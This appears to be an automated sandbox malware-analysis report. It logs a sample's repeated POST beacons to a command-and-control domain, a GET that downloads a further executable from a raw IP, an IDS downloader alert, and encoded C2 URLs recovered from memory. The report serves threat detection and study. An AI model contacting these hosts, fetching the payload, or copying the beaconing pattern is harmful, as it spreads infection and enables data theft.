                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 30 32 41 45 45 45 38 34 45 34 38 46 31 33 44 35 34 38 33 32 37 42 33 37 31 46 44 31 38 39 30 30 33 44 34 43 35 35 42 45 32 34 34 35 43 34 35 42 34 41 32 41 41 37 45 30 36 39 41 46 42 44 36 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE902AEEE84E48F13D548327B371FD189003D4C55BE2445C45B4A2AA7E069AFBD6C4
                          Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: Joe Sandbox ViewIP Address: 213.209.150.137 213.209.150.137
                          Source: Joe Sandbox ViewIP Address: 107.189.27.66 107.189.27.66
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49690 -> 45.59.120.8:80
                          Source: unknownTCP traffic detected without corresponding DNS query: 45.59.120.8
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exeCode function: 0_2_0007C3B0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,0_2_0007C3B0
                          Source: global trafficHTTP traffic detected: GET /files/dinnmamunms/cubrodriver.exe HTTP/1.1Host: 45.59.120.8
                          Source: global trafficDNS traffic detected: DNS query: cobolrationumelawrtewarms.com
                          Source: global trafficDNS traffic detected: DNS query: towerbingobongoboom.com
                          Source: unknownHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%E6%EF%EF%E3%F0%ED%ED%E9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.php
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%E6%EF%EF%E3%F0%ED%ED%E9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpgkwr.xyz
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.php
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpB
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpO
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpP?z
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpY
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpZ
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%e6%ef%ef%e3%f0%ed%ed%e9%20jlgenfekjlfnvtgpegkwr.xyz/3ofn3jf3e2ljk/index.phpc
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exe
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exe0a73
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exe;
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exeb
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.59.120.8/files/dinnmamunms/cubrodriver.exekwr.xyz
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA2562021CA1.crt0
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.dr, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000093F000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpF
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpH
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpI
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpSA1
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpeK
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpekjlfnvtgpegkwr.xyz
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpekjlfnvtgpegkwr.xyz5
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpf
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpheR
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpqA_
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                          Source: Gxtuum.exe, 00000001.00000002.3779688440.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, cubrodriver.exe, 00000005.00000002.1446823242.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, fvvb.exe.5.dr, cubrodriver[1].exe.1.dr, cubrodriver.exe.1.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                          Source: Fp80Ocyhqm.exe, Gxtuum.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
